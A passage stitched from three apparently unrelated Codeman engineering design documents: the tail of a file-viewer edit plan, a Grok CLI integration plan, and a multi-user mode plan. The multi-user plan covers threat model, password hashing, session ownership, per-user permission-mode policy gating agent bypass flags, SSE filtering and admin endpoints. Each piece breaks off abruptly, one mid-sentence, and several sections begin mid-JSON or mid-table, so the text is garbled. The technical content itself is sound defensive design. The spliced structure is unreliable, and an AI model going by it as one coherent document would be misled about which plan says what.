11. over `MAX_EDITABLE_BYTES` gives 413
12. a path that does not exist gives 404 and creates nothing (no `O_CREAT`)
13. multi-user: `authUser: {role:'user'}` against another user's session gives 404 (pass `authUser` to
`createRouteTestHarness`, otherwise the synthetic admin makes the test pass vacuously)
14. CRLF file edited and saved stays CRLF
15. file mode is preserved across the temp-plus-rename
Run with `npm test -- test/routes/file-write-routes.test.ts`, never bare `npm test`.
**End-to-end verification before any deploy** (unit tests passing is not sufficient here):
-`curl -sk https://localhost:3000/...` against a **throwaway** session created for the purpose, never
`w1`/`w2`/`w3`; delete it by exact id afterwards.
- Playwright on a phone profile: open a preview, tap Edit, type with `page.keyboard.type()`, Save, then
assert the bytes on disk changed. Assert real state, not HTTP 200.
---
## 8. Docs and release
- This plan lives at `docs/file-viewer-edit-plan.md`.
-`docs/architecture-invariants.md`: new anchor `#file-viewer-edit-mode` covering the write confinement
chain, the truncation invariant, and why temp-plus-rename.
-`CLAUDE.md`: one line under the **Filesystem path picker** neighborhood noting that the File Viewer now
has a **third** file surface and that it is the only one that writes, plus its confinement rules.
Remember `CLAUDE.md` is prettier-ignored on purpose.
-`docs/api-reference.md`: the new `PUT` and the `edit=1` query.
- Release: a normal COM applies (the 1.10.0 batch hold is over). This is a new user-facing feature plus an
additive API surface, so **COM minor** when it ships.
Formatting note: `panels-ui.js`, `styles.css`, `mobile.css`, `index.html` are all in `.prettierignore` and
are hand-formatted; new TypeScript (`src/config/file-editing.ts`, route + schema edits) is prettier-enforced
and must pass `npm run format:check`.
---
## 9. Implementation order
Each phase is independently reviewable and leaves the tree working.
1.**Policy module + tests.**`src/config/file-editing.ts` and `test/file-editing-policy.test.ts`. Pure, no
route wiring. (Small.)
2.**Read-for-edit.**`edit=1` (returning `hash`/`eol`) plus the additive `editable` flag on plain reads,
> Template: the pi integration (`c5b5963`, [`pi-integration-plan.md`](./pi-integration-plan.md)),
> which was itself calibrated against the four follow-up commits the antigravity
> integration needed. All of grok's facts below were verified against **grok 1.0.5**
> (`grok 1.0.5 (5115b46bc9)`), installed live during the work.
## 1. What Grok Build is
[xai-org/grok-build](https://github.com/xai-org/grok-build) is xAI's coding agent: a
Rust fullscreen-TUI binary named `grok`, installed by
`curl -fsSL https://x.ai/cli/install.sh | bash` into `~/.grok/bin` (with symlinks into
`~/.local/bin`; the installer also ships an `agent` alias). Config lives in
`~/.grok/config.toml`, TUI appearance in `~/.grok/pager.toml`, credentials in
`~/.grok/auth.json` (0600), sessions under `~/.grok/sessions/`. Auth is browser OAuth
on first launch, `grok login --device-auth` for SSH boxes, or `XAI_API_KEY` for
headless use. It has Claude-style permission modes (`default`/`acceptEdits`/`auto`/
`dontAsk`/`bypassPermissions`/`plan`), allow/deny rules, hooks, MCP, subagents, and a
headless `-p` mode.
## 2. Shape decisions (why grok is wired the way it is)
Grok is a seventh run mode, alongside Claude Code, shell, OpenCode, Codex, Gemini,
Antigravity and Pi. Never a location overlay, never a web tab. Its wiring mixes two
existing shapes:
| Question | Decision | Why |
| --- | --- | --- |
| Permission bypass | `GrokConfig.alwaysApprove` -> `--always-approve` | Grok's real flag (verified via `--help`): "Auto-approve all tool executions", i.e. its `bypassPermissions` mode. Config-level deny rules still apply on top. The Run button sends `true`, matching `runAntigravity()` and Claude's own `--dangerously-skip-permissions` default: Codeman sessions exist for autonomous work. |
| Multi-user clamp branch | only-if-sent (codex/antigravity branch) | A bare `grok` spawn is grok's own ask-mode default, which is already safe, so the clamp only needs to force a SENT `alwaysApprove` off. Contrast pi, whose absent default is an answerable prompt and therefore needs the materialize branch. Cron needs nothing for grok for the same reason (`clampCronExternalCliConfigs`). |
| Alt-screen strip | OUT of `isAltScreenStripMode()` | Grok is a fullscreen alternate-screen TUI with mouse support (its own scrollback pane, `pager.toml [terminal] alt_screen`), i.e. the opencode case, not the Ink repaint case. It falls through to the narrow tmux-attach strip like opencode/antigravity/pi. |
| Resolver | version probe, like pi | `grok` has npm squatters (the unrelated `@vibe-kit/grok-cli` installs a `grok` bin). Candidates must pass `grok --version`; `GROK_VERSION_REGEX` is exported and shared with the dependency registry so doctor and run mode cannot disagree. The probe cannot tell two version-printing `grok`s apart, so `GET /api/grok/status` surfaces path AND version. Search dirs: `~/.grok/bin` first (installer target), then `~/.local/bin`, `/usr/local/bin`, `~/bin`. |
| Env allowlist | `GROK_*` + `XAI_*` prefixes | `GROK_*` covers grok's documented inputs (`GROK_HOME`, `GROK_CONFIG`/`GROK_CONFIG_PATH`, `GROK_MEMORY`, `GROK_WORKFLOWS`, `GROK_SANDBOX`, `GROK_OIDC_*`, `GROK_AUTH_PROVIDER_COMMAND`). `XAI_*` is xAI's vendor namespace and carries `XAI_API_KEY`, grok's documented headless auth var: the same narrow-vendor-namespace reasoning that admitted `GOOGLE_*` for gemini. Foreign provider keys stay out, as always. |
| Resume | `--resume <id>` / `--continue`, id-regexed | Grok's `--resume` also matches session TITLES (arbitrary user strings, case-insensitive). The `^[a-zA-Z0-9._-]+$` regex doubles as the no-titles rule, so nothing free-form can reach the `bash -c` spawn line. A valid explicit id wins over `-c`, mirroring pi. |
| Local echo | `'buffer'` via the `_updateLocalEchoState` fallthrough | UNMEASURED against an authenticated session (see §4). If grok's composer turns out per-keystroke reactive like codex's, the fallback is one `'off'` branch; teaching `PredictiveEchoAddon` grok's composer row is the larger follow-up. |
| Truecolor | `COLORTERM=truecolor` + `unset NO_COLOR` | Rust TUI with themes; joins the codex/gemini/antigravity/pi list in `buildEnvExports()` and `buildMuxAttachEnv()`. |
| Docker credentials | per-file seed: `auth.json`, `config.toml`, `pager.toml` | `~/.grok` also holds `sessions/`, `memory/`, `completions/`, `docs/` and the ~160MB binary under `downloads/`; a whole-dir seed would copy all of it on every container start. Same trade-off as pi: in-container sessions are invisible host-side, so `grok -c` in a Docker case sees only that container's history. |
| Docker install | own Dockerfile step | Not an npm package. xAI's installer has no `--dir` override, so the step copies `/root/.grok/bin/grok` (through the symlink, `cp -L`) into `/usr/local/bin` and removes root's `~/.grok` in the same layer. |
| Remote SSH | `exec "$SHELL" -i -l -c 'grok'` | sshd's remote-command PATH does not include `~/.grok/bin`; same login-shell fix as every other agent CLI. |
| What is NOT wired | `--permission-mode`, `--allow`/`--deny`, `-p` headless, `--worktree`, `--sandbox`, `--reasoning-effort`, `-s/--session-id`, `--fork-session`, `--agent`, `--output-format` | Follow-ups. The flag surface is kept minimal on purpose; grok is pre-1.0-style fast-moving and every flag added is a flag validated forever. |
Status: **IMPLEMENTED on `feat/multiuser-mode`** (phases 1-5; opt-in, off by default). Target: opt-in multi-user support behind a `--multiuser` flag, with per-user case spaces and an admin panel for user management.
Deferred follow-ups (documented, non-blocking): away-digest + subagent/workflow REST-list scoping, push-subscription identity/routing, per-user screenshot subdirs, `linked-cases.json` v2 owner field, `ScheduledRun.owner`, plan-orchestrator internal one-shot mode resolution, and a Playwright browser pass. Phase 6 (login form replacing Basic) remains out of scope.
## 1. Summary
Today Codeman is strictly single-user: one optional credential pair (`CODEMAN_USERNAME`/`CODEMAN_PASSWORD`), one shared `~/codeman-cases` folder, one global session list, and a global SSE/WS fan-out. This plan adds an opt-in **multi-user mode**:
- **Off by default.** Without the flag, behavior stays byte-identical to today (same auth path, same paths, same payloads). All new code is gated behind `isMultiUserMode()`.
- **`codeman web --multiuser`** (or `CODEMAN_MULTIUSER=1`) enables named users with individually hashed passwords stored in `~/.codeman/users.json`.
- **Each user gets their own space**: `~/codeman-users/<username>/cases/<case>` replaces the shared `~/codeman-cases` for that user. Sessions, cases, attachments, search, digests, and SSE events are scoped to their owner.
- **Admin panel** (App Settings, admin-only "Users" tab): create/delete users, change/reset passwords, enable/disable accounts, delete a user's space, see per-user live sessions and disk usage, force logout.
## 2. Threat Model (read first, be honest about this)
Multi-user mode is **workspace separation for a trusted team, NOT security isolation between mutually distrusting users**:
- Every session still runs as the **same OS account** with `claude --dangerously-skip-permissions`. Any user can ask their agent to `cat /home/<host>/codeman-users/otheruser/...`. The web layer enforces scoping; the agent layer cannot.
- **Shell sessions and custom launch commands are the bluntest holes**: `SessionMode = 'shell'` hands out a raw shell as the host account, and a cron job's `launchCommand` runs an arbitrary command; no Claude permission classifier is involved in either. These must be gated behind the same grant as bypass (section 6.3), otherwise the `auto`-mode mitigation below is theater.
- All sessions share one tmux socket (`-L codeman`), one `~/.claude` (transcripts, credentials, plan usage), one Claude subscription.
- Mitigation for stronger isolation: pair a user's cases with **Docker cases** (container per case, `docs/docker-cases.md`), or run separate Codeman instances per user (`CODEMAN_INSTANCE`, separate OS accounts). True per-user OS isolation is explicitly **out of scope** for this feature.
- Partial mitigation at the agent layer: non-admin users default to Claude's `auto` permission mode (section 6.3), whose safety classifier blocks destructive actions and credential exfiltration. That reduces, but does not eliminate, cross-user snooping; the `canBypassPermissions` grant reopens it and should be given deliberately.
This must be stated loudly in `docs/security-architecture.md`, the README section, and the admin panel UI ("Users share the host account; this separates workspaces, it does not sandbox users from each other").
Also note the flip side: multi-user mode strictly _improves_ today's network posture, because it removes the single shared password and gives every person their own revocable credential.
| No flag (default) | Exactly today's behavior. `users.json` is never read. Single-user auth via `CODEMAN_PASSWORD` if set. |
| `--multiuser` / `CODEMAN_MULTIUSER=1`, `users.json` has users | Multi-user auth active. `CODEMAN_PASSWORD` is ignored for login (warn if set). |
| `--multiuser`, no `users.json` (first boot) | Bootstrap: if `CODEMAN_USERNAME`/`CODEMAN_PASSWORD` are set, create that user as the initial admin and continue. Otherwise refuse to start with instructions to run `codeman users add <name> --admin`. Never start multi-user with zero users (there would be no way in). |
| `--multiuser` on a non-loopback bind | Allowed without `CODEMAN_PASSWORD`: `server.ts start()` treats "multi-user with >= 1 enabled user" as satisfying the auth requirement in the loud-warning check (wire into the existing `isLoopbackBindHost()` branch). |
| Flag later removed | Single-user mode again. Sessions/state that carry `owner` fields keep working (owner is simply ignored); user spaces remain on disk untouched. |
Plumbing: flag in `src/cli.ts` (web command), env in a new `src/config/multiuser.ts` exporting `isMultiUserMode()`. Per-instance like everything else: a beta instance (`CODEMAN_INSTANCE=beta`) has its own `users.json` via `dataPath()`.
"algo":"scrypt",// node:crypto scrypt, no new deps
"N":16384,
"r":8,
"p":1,
"salt":"<hex 32B>",
"hash":"<hex 64B>",
},
"disabled":false,
"mustChangePassword":false,// set by admin reset; gates all API access until changed
"canBypassPermissions":false,// permission-mode grant, see section 6.3; false for new users
"createdAt":1752900000000,
"lastLoginAt":1752900000000,
},
],
}
```
- **Username rules**: `^[a-z0-9][a-z0-9_-]{1,31}$` (it becomes a folder name), stored lowercase, unique case-insensitively. Reserve `admin`? No: any name can be admin; role is a field, not a name.
- **Hashing**: `scrypt` from `node:crypto` with per-user salt, compared via `timingSafeEqual`. Params stored per record so they can be raised later; verify tolerates old params and rehashes on next successful login.
- New module `src/user-store.ts` (mirrors the `remote-hosts.ts` / `docker-hosts.ts` pattern): `readUsers()`, `writeUsers()`, `verifyPassword()`, `createUser()`, `setPassword()`, `deleteUser()`, plus pure helpers (`isValidUsername`, `hashPassword`) that are unit-testable without IO. In-process cache with short TTL like `readSettings`, invalidated on every write; the short TTL also covers the CLI (section 10) editing `users.json` while the server runs (cross-process changes picked up within the TTL).
### 4.2 User spaces
```
~/codeman-users/
alice/
cases/
my-project/ <- same layout as today's ~/codeman-cases/<case>
bob/
cases/
```
- New helper in `route-helpers.ts`:
`resolveCasesDir(user?: AuthUser): string`
single-user mode: returns `CASES_DIR` (today's `~/codeman-cases`); multi-user: returns `join(USER_SPACES_DIR, user.username, 'cases')`, creating it lazily on first use.
-`CASES_DIR` stays exported for single-user code paths, but every route usage (see 6) switches to the resolver.
- The **user folder** (`~/codeman-users/<username>/`) is the deletion unit for "delete user + space" and leaves room for future per-user extras (uploads, exports) beside `cases/`.
- Legacy `~/codeman-cases` in multi-user mode: surfaces to admins only, as a read-only "Unassigned (legacy)" group in the case list, with an admin action `POST /api/admin/cases/assign { case, username }` that `fs.rename`s the folder into a user's space (same-filesystem move, cheap). No automatic migration.
Keep the existing single-user branch untouched. Add a parallel multi-user branch selected once at registration time:
1.**Credential check**: Basic header parsed into `username:password`, verified against the user store (scrypt + `timingSafeEqual`). Disabled users fail closed.
2.**Cookie sessions**: same `codeman_session` cookie and `StaleExpirationMap`, but `AuthSessionRecord` gains `username` and `role`. All existing TTL/sliding/eviction logic reused. Eviction cap becomes per-user aware (evict oldest _of that user_ first) so one user cannot flush everyone's sessions by logging in 100 times.
3.**Request identity**: decorate `req.authUser = { username, role }` (Fastify decorateRequest). In single-user mode `req.authUser` is `{ username: 'admin', role: 'admin' }` when auth is on, and a synthetic admin when auth is off, so downstream code has ONE code path.
4.**Rate limiting**: keep the per-IP bucket; add a per-username failure bucket (same `StaleExpirationMap` pattern) so a botnet cannot brute-force one account across IPs, and one flaky user behind a NAT cannot lock out the rest.
5.**`mustChangePassword` gate**: when set, every API request except `GET /api/me`, `POST /api/me/password`, and static assets returns 403 with `errorCode: 'PASSWORD_CHANGE_REQUIRED'`; the frontend intercepts that code and shows the change-password modal.
6.**Password change vs Basic-auth caching**: browsers cache Basic credentials. After a password change we revoke all of that user's cookie sessions; the next request falls to Basic with stale creds, gets 401, and the browser re-prompts. Acceptable for v1; a proper login form is Phase 6 (see 15).
7.**Unchanged**: hook-secret loopback bypass (hooks authenticate the _instance_, not a user; the event maps to a session which has an owner), host guard, Origin/CSRF guard, security headers.
8.**WS upgrade identity** (`ws-routes.ts`): the global auth `onRequest` hook does run on the upgrade request (`@fastify/websocket` v11 runs hooks before the handshake; browsers send the session cookie), but the route handler itself only checks Host/Origin and never learns WHO authenticated. Multi-user: the handler reads the decorated `req.authUser` and closes 4003 unless owner or admin (section 6.4; identity plumbing lands in Phase 2, the owner check in Phase 4 once sessions have owners). Add a regression test that an upgrade with no credentials is rejected while auth is active: the handler-level Host/Origin gate alone must never be mistaken for auth.
9.**QR auth** (`/q/:code` redemption in `system-routes.ts`, minting in `tunnel-manager.ts`): today there is ONE global token, auto-rotated every 60s with a 90s grace window. A globally-rotating token cannot carry an identity (every logged-in user sees the same code), so multi-user mode replaces rotation with **on-demand minting**: an authenticated `POST /api/tunnel/qr` mints a single-use, short-TTL token bound to `req.authUser.username` (field on `QrTokenRecord`); redemption creates a cookie session for that user. Existing rate-limit buckets (`qrAuthFailures`, global `QR_RATE_LIMIT_MAX`) apply unchanged. Single-user mode keeps the rotating token.
New error codes in `src/types/api.ts`: `FORBIDDEN`, `PASSWORD_CHANGE_REQUIRED`, `USER_EXISTS`, `USER_NOT_FOUND`, `LAST_ADMIN`.
Role guard helper in `route-helpers.ts`: `requireAdmin(req, reply): boolean` used as the first line of every admin handler (403 `FORBIDDEN`), plus `requireOwnerOrAdmin(req, session)`.
## 6. Ownership Threading (the big refactor)
### 6.1 Sessions
-`Session` gains `owner?: string` (constructor option), persisted in `SessionState.owner`, included in `toState()`, round-tripped through recovery (`mux-sessions.json` entries carry it, `restoreMuxSessions` passes it back, exactly like `remote`/`docker`).
- Every session-creating path stamps the owner from `req.authUser`. Verified inventory of `new Session(...)` call sites: `POST /api/sessions` (session-routes.ts:444), `POST /api/quick-start` (:1956), `POST /api/run` one-shot (:1652), Ralph start (ralph-routes.ts:327), **cron** (cron-service.ts:352; `CronJob` gains `owner`, stamped at job create, launched as the job's owner), legacy `ScheduledRun` loop (server.ts:1603), plan generation + plan-orchestrator agents (plan-routes.ts:128, plan-orchestrator.ts:422/578; owner = requesting user), and recovery (server.ts:2225, next bullet). Two non-paths, also verified: **respawn never constructs a new Session** (it re-spawns the PTY on the same object, so `owner` survives automatically; no inheritance logic needed), and **orchestrator-loop creates no sessions** (it schedules work onto existing idle sessions via the task queue; its scoping requirement is different: it must only pick idle sessions owned by the goal's creator).
- Recovery: `owner` must ALSO be mirrored on `MuxSession` (mux-sessions.json) and read back mux-first like `remote`/`docker` (`muxSession.owner ?? savedState?.owner`, the server.ts:2246-2250 pattern), or a reboot erases ownership on the next persist.
- Every session-reading/mutating route filters: non-admin users only see and act on `session.owner === req.authUser.username`. Centralize in `findSessionOrFail` (route-helpers.ts:87; the owner check there covers the 6 route files that use it: system/session/respawn/ralph/file/plan-routes) and in the list endpoints (`GET /api/sessions`, `GET /api/sessions/unified`, `GET /api/status`). The Phase 3 audit must grep for BOTH `sessionManager.getSession` AND direct map access (`ctx.sessions.get(` / `.has(`): ws-routes and hook-event-routes reach sessions that way and bypass `findSessionOrFail`.
- Admins see everything; every session row carries `owner` so the UI can badge it.
### 6.2 Cases
- All `CASES_DIR` call sites switch to `resolveCasesDir(req.authUser)`: `case-routes.ts` (list/create/delete/CLAUDE.md scaffolding, name-collision checks, docker quickcreate), `session-routes.ts` (quick-start case resolution, the workingDir-inside-cases env-strip check), `ralph-routes.ts` (case path resolution), and `plan-routes.ts:231` (easy to miss). Case-name-to-path resolution is currently DUPLICATED (`resolveCasePath` in case-routes.ts:82 and an inline copy in quick-start, session-routes.ts:1846-1863); consolidate into one owner-aware resolver as part of this refactor instead of patching both copies.
- Registries that map case names to metadata become owner-scoped. `remote-cases.json`/`docker-cases.json` are arrays of objects, so entries simply gain `owner?: string` (absent = legacy: admin-only). `linked-cases.json` is a flat `Record<caseName, path>` with no room for a field: it needs a v2 shape (`{ "version": 2, "cases": { "<name>": { "path": "...", "owner": "..." } } }`) with read-time migration of the v1 form; it is read in two places (case-routes AND inline in quick-start), both must move to the new reader. Case names only need to be unique per user.
- **Remote hosts and Docker hosts are machine-level resources**: CRUD on `/api/docker-hosts` and remote-host endpoints becomes admin-only in multi-user mode; regular users can _use_ hosts on their own cases but not define them. (Docker containers exec as the host account; letting any user define arbitrary `docker run` args is admin-equivalent.)
- Case deletion, exports (`docker-exports/`), and imports check ownership; export filenames get an owner prefix to avoid collisions (fits the existing `^[a-zA-Z0-9._-]+\.tgz$` download guard).
- **Workspace confinement for non-admins (the linchpin, do not skip)**: today `POST /api/sessions` accepts ANY host directory as `workingDir` (the only check is `statSync().isDirectory()`, session-routes.ts:305-318), and file-routes/attachments confine reads to `session.workingDir`. Without a new rule the whole scoping story is circular: a user points a session at `~/codeman-users/bob` (or `/home`) and the web layer itself serves that subtree, no agent needed. Rule: in multi-user mode a non-admin's `workingDir` must realpath-resolve inside their own space, enforced at `POST /api/sessions`, `POST /api/run`, cron job create AND fire time (the dir can change owners between the two), and Ralph auto-configure. Admins are unrestricted. This one rule is what makes the section 6.4 file-route line ("own space or own sessions' workingDirs") meaningful.
### 6.3 Per-user Claude permission-mode policy
Codeman now ships a global **Startup Mode** picker (App Settings, Claude CLI tab: `settings.claudeMode`, values `dangerously-skip-permissions` (default) | `auto` | `normal` | `allowedTools`; `auto` emits `--permission-mode auto`, Anthropic's classifier-guarded low-prompt mode). Multi-user mode layers a per-user policy on top of it:
- **Default for regular users: `auto` only.** A non-admin's Claude sessions are forced to `--permission-mode auto` regardless of the global `claudeMode` setting. `normal` and `allowedTools` are also permitted (they are strictly more restrictive than auto), but `dangerously-skip-permissions` is NOT.
- **Bypass is an explicit admin grant**: `canBypassPermissions: true` on the user record (default `false`, section 4.1). Only with that grant does the global skip-permissions default (or a future per-user choice) apply to their sessions.
- **Admins** are unrestricted; the global setting applies to them as-is.
- **Single enforcement point**: a pure `resolveClaudeModeForUser(globalMode, user)` in `user-store.ts`, applied server-side at option-resolution time, BEFORE the Session constructor, so both downstream arg builders inherit it for free (`buildPermissionArgs` in session-cli-builder.ts for the direct-PTY path AND `buildClaudePermissionFlags` in tmux-manager.ts for tmux panes; there are two builders, not one). Call sites where `getClaudeModeConfig()` feeds a spawn: session-routes.ts:452/1964, ralph-routes.ts:334, cron-service.ts:360, and recovery (server.ts:2214/2233). Recovery re-reads the GLOBAL setting on reboot, so the resolver must run there with the RECOVERED owner, or a restart silently un-downgrades every restored session. Never resolved in the frontend, so it cannot be bypassed via payload.
- **Downgrade, don't error**: a non-granted user whose effective mode would be bypass gets `auto` silently (logged + surfaced as a badge on the session), so shared presets keep working.
- **Other CLIs' bypass equivalents** follow the same grant: Codex `--dangerously-bypass-approvals-and-sandbox` (`codexDangerouslyBypassApprovals`) and Gemini `--approval-mode yolo` are refused for non-granted users (Gemini falls back to `auto_edit`, Codex to its default sandbox). Whether this stays one grant or splits per-CLI is an open question (section 15).
- **Shell mode and custom launch commands follow the grant too**: `mode: 'shell'` sessions and cron `launchCommand` are arbitrary command execution as the host account, strictly stronger than any bypass flag, and no permission-mode downgrade applies to them. Non-granted users get 403 `FORBIDDEN` on shell session/quick-start creation and on cron jobs carrying `launchCommand` (checked at create AND at fire time). Folding them under `canBypassPermissions` keeps the model one-bit; section 15 asks whether it should split.
- **Admin UI**: a "Can skip permissions" toggle per user in the Users tab (PATCH field, section 8), with a warning echoing the section 2 threat model.
- Revoking the grant takes effect on the user's NEXT session start; live sessions are listed so the admin can restart them.
| SSE `/api/events` | Per-connection filter (see 7) |
| WS terminal (`ws-routes.ts`) | Handler reads `req.authUser` (section 5.8) and closes 4003 unless owner or admin; today it checks Host/Origin only and has no identity |
| `GET /api/search` | `harvestSources()` only over owned sessions |
| `GET /api/away-digest` | Aggregate only owned sessions/events |
| `GET /api/subagents`, workflow runs | Filter by owning session (`claudeSessionId -> session -> owner`); agents not attributable to any session: admin-only |
| Push (`push-routes.ts`) | Subscription records currently carry NO identity (keyed by endpoint only): `subscribe` stamps `username`. All 8 `PUSH_EVENT_MAP` events are session-scoped, so routing = resolve owner from `data.sessionId`, deliver to that owner's (plus admins') subscriptions. Legacy identity-less subscriptions: admin-only delivery |
| Screenshots `/api/screenshots` | Per-user subdir `~/.codeman/screenshots/<username>/` in multi-user mode. Note: `GET /:name` deliberately rejects `/` in names as traversal, so derive the subdir server-side from `req.authUser` and keep client-visible names flat |
| Attachments | Already session-scoped; inherits the session owner check. `attachmentConfineToWorkspace` is a global, default-OFF setting today: in multi-user mode it is FORCED ON for non-admins regardless of the setting (their attachments must resolve inside their own space); the setting keeps meaning what it means for admins |
| File routes (browse/preview) | Path allowlist adds: non-admin paths must resolve (realpath) inside their own space or their own sessions' workingDirs |
| Settings (`settings.json`) | Global, admin-only writes in multi-user mode; reads allowed (per-device display keys stay in localStorage as today). Per-user server settings: out of scope v1 |
| `getLightState` init snapshot | Filtered per connection. Actual contents to filter (verified): `sessions`, `scheduledRuns`, `respawnStatus`, `subagents`, `workflowRuns`, `planUsage` (host-plan telemetry: admin-only); `globalStats` stays coarse-global. Cron jobs are NOT in the snapshot (they have their own REST route; filter there). The snapshot is cached process-wide (`LIGHT_STATE_CACHE_TTL_MS`): either key the cache per role/user or filter AFTER the cache on each send |
## 7. SSE Event Filtering
`/api/events` currently broadcasts everything to everyone. Ground truth first (verified): `broadcast()` lives in `SseStreamManager` (`sse-stream-manager.ts`), not server.ts; clients are keyed by the raw Fastify reply (`sseClients: Map<FastifyReply, Set<string> | null>`, plus `sseClientsById` for live filter updates); the existing `?sessions=` filter is a bandwidth optimization applied ONLY to `session:terminal` batches in `flushSessionTerminalBatch()`, while `broadcast()` itself loops ALL clients unconditionally. The single-client delivery primitive already exists (`sendSSE`, used for the per-connection init snapshot). Plan:
- At connection time, resolve `req.authUser` and store `{ username, role }` with the client. Concretely: extend `addClient(reply, sessionFilter, isRemote, clientId)` to take the identity and change the `sseClients` map value to `{ filter, identity }` (or add a parallel `Map<reply, identity>`); there is no per-client record object today to hang it on.
-`broadcast()` gains an optional routing hint: `broadcast(event, data, { sessionId?, adminOnly?, username? })`. Resolution order per client: admin sees all; `username` targets one user; `sessionId` resolves owner via SessionManager; `adminOnly` for machine-level events (docker image builds, tunnel, self-update); no hint = broadcast to all (connection status etc.).
- **Enforce the identity check in BOTH `broadcast()` AND `flushSessionTerminalBatch()`**: the terminal batch path does not go through `broadcast()`, and it carries the highest-value payload (raw terminal bytes).
- Sweep of the ~120 backend event constants in `sse-events.ts`: mechanically, everything `session:*`, `ralph:*`, `respawn:*`, `subagent:*`, `workflow:*`, `attachment:*`, `cron:*` (job owner) carries or can resolve a sessionId/owner; `docker:*`, `system:*`, tunnel and update events are adminOnly; a short tail needs case-by-case decisions during implementation.
- The existing `?sessions=` filter and `/api/events/subscribe` compose with (never override) the ownership filter: the subscription filter can only narrow within what the identity allows.
## 8. Admin API (`src/web/routes/admin-routes.ts`, new module + `AdminPort`)
All handlers: multi-user mode only (404 otherwise), `requireAdmin`, Zod schemas in `schemas.ts`, `ApiResponse` envelope, audit-logged.
| `GET /api/admin/users` | List users + stats: role, disabled, createdAt, lastLoginAt, live session count, case count, space disk usage (best-effort async walk, cached 60s), active cookie-session count |
| `POST /api/admin/users` | Create: `{ username, role, password? }`. No password given: generate a one-time password, return it ONCE in the response, set `mustChangePassword` |
| `PATCH /api/admin/users/:username` | `{ role?, disabled?, canBypassPermissions? }`. Demoting/disabling the last enabled admin: 409 `LAST_ADMIN`. Disable also revokes cookie sessions. `canBypassPermissions` is the section 6.3 grant (default false) |
| `POST /api/admin/users/:username/logout` | Revoke all cookie sessions for that user. Honest limit under Basic auth: the browser silently re-sends cached credentials and gets a fresh cookie on the next request, so logout only truly ends QR-issued sessions; to actually lock someone out, disable the account or reset the password. Say so in the panel tooltip until Phase 6 |
| `DELETE /api/admin/users/:username` | `{ deleteSpace?: boolean }` (default false). Refuses last admin. Kills the user's live sessions first (normal kill flow, incl. docker/remote teardown per case), revokes cookies, removes from store. With `deleteSpace`: guarded recursive delete of `~/codeman-users/<username>` (realpath must be inside `USER_SPACES_DIR`, top-level dir must not be a symlink), plus their registry entries and push subscriptions |
| `POST /api/admin/cases/assign` | Move a legacy `~/codeman-cases/<case>` into a user's space (`fs.rename`) |
| Self-service `GET /api/me` | `{ username, role, mustChangePassword }` (works in single-user mode too: synthetic admin; the frontend uses it to decide whether to render admin UI) |
| Self-service `POST /api/me/password` | `{ currentPassword, newPassword }`, verifies current, min length 8, revokes other sessions, clears `mustChangePassword` |
**Audit log**: append-only `~/.codeman/admin-audit.jsonl` (same idiom as `session-lifecycle.jsonl`): timestamp, acting admin, action, target, request IP. User management without an audit trail is not acceptable even for a homelab tool.
SSE additions (both `sse-events.ts` and `constants.js`): `admin:usersChanged` (adminOnly; the panel re-fetches) and `auth:passwordChangeRequired` (targeted to the user).
## 9. Frontend
- **`GET /api/me` on boot** (app.js init): stores `window.__codemanUser`; everything below keys off it. Single-user mode returns the synthetic admin, so the UI needs no mode awareness beyond "am I admin".
- **Admin panel**: new tab "Users" in the App Settings modal (settings-ui.js), rendered only for admins in multi-user mode. Table of users with actions (create, reset password showing the one-time password in a copy-to-clipboard reveal, enable/disable, role toggle, logout, delete with a typed-username confirm for the delete-space variant). No new header button (mobile header policy test stays green; the settings modal is already reachable everywhere).
- **Change-password modal**: shown on `PASSWORD_CHANGE_REQUIRED` (fetch interceptor in api-client.js) and reachable from settings for self-service.
- **Owner badges**: admin's session tabs and the session palette/manager show `owner` on foreign sessions; regular users see no change.
- New module `admin-ui.js` if the settings-ui.js addition gets large (load order after settings-ui, before session-ui), else keep inside settings-ui.js. Follow the `@fileoverview` + `@loadorder` convention either way.
## 10. CLI Additions (`src/cli.ts`)
Headless bootstrap and recovery must not require the web UI:
```
codeman users add <name> [--admin] # prompts for password (hidden input), or --password-stdin
codeman users passwd <name> # reset password
codeman users list
codeman users rm <name> [--delete-space]
```
These operate directly on `users.json` via `user-store.ts` (no server needed), honoring `CODEMAN_INSTANCE`. This is also the answer to "locked out: last admin forgot password".
## 11. Limits and Config
- New `src/config/multiuser.ts`: `isMultiUserMode()`, `USER_SPACES_DIR` (`~/codeman-users`, overridable via `CODEMAN_USER_SPACES_DIR` for tests), `MAX_USERS` (default 25), per-user session cap (default: global cap / 2, env `CODEMAN_MAX_SESSIONS_PER_USER`).
- Cap enforcement is currently COPY-PASTED: the global `MAX_CONCURRENT_SESSIONS` (50, `config/map-limits.ts:25`) check appears at 6 independent sites (session-routes.ts:298/1622/1683, ralph-routes.ts:275, cron-service.ts:340, server.ts:1595). Do not add a 7th copy per site: extract one `assertSessionCapacity(ctx, owner?)` helper doing the global + per-user checks and use it everywhere, or the per-user cap WILL miss a path.
- Global limits (50 sessions, SSE clients 100, terminal buffers) are unchanged and shared; the per-user session cap is the fairness lever.
| Default (no flag) | No behavior change. No new file reads on the hot path. All new fields optional in state |
| State round-trip | `SessionState.owner`, `MuxSession.owner`, `CronJob.owner`, registry `owner` fields are optional; old state loads clean; new state loaded by an old build ignores unknown fields (existing tolerant parsing) |
| Instance isolation | `users.json`, audit log, screenshots subdirs all via `dataPath()`; user spaces dir is shared across instances like `~/codeman-cases` is today (documented) |
| API versioning | HTTP API is internal per `docs/versioning-policy.md`; still, all changes are additive. Ship as a **minor** version |
| Hooks | Unchanged (instance-level hook secret; owner resolved from the session) |
## 13. Implementation Phases
Each phase is independently shippable behind the flag and ends with its tests green.
**Phase 1: user store + mode plumbing** (no behavior change yet)
Tests: `test/multiuser-auth.test.ts` (live server, unique port 3170+; wrong password, disabled user, cookie carries identity, per-user rate limit isolation, mustChangePassword lockbox, QR redemption identity). Reuse the `delete process.env.CODEMAN_PASSWORD` idiom from `test/setup.ts`.
**Phase 3: ownership threading**
Session `owner` + persistence + `MuxSession` mirror + recovery; `resolveCasesDir()` refactor across case/session/ralph/plan routes (consolidating the duplicated case-path resolution); registry owner fields incl. the linked-cases v2 shape; `findSessionOrFail` owner check + the direct-`sessions.get` audit; list filtering; owner stamping across ALL create paths from 6.1; **non-admin workingDir confinement** (6.2); permission-mode/shell/launchCommand policy (6.3); `assertSessionCapacity` helper + per-user cap.
Tests: `test/routes/ownership-scoping.test.ts` (inject-based: user A cannot read/kill/input user B's session, case lists are disjoint, admin sees both), extend `test/cron-service.test.ts` for owner stamping, recovery round-trip in the existing mux-recovery tests.
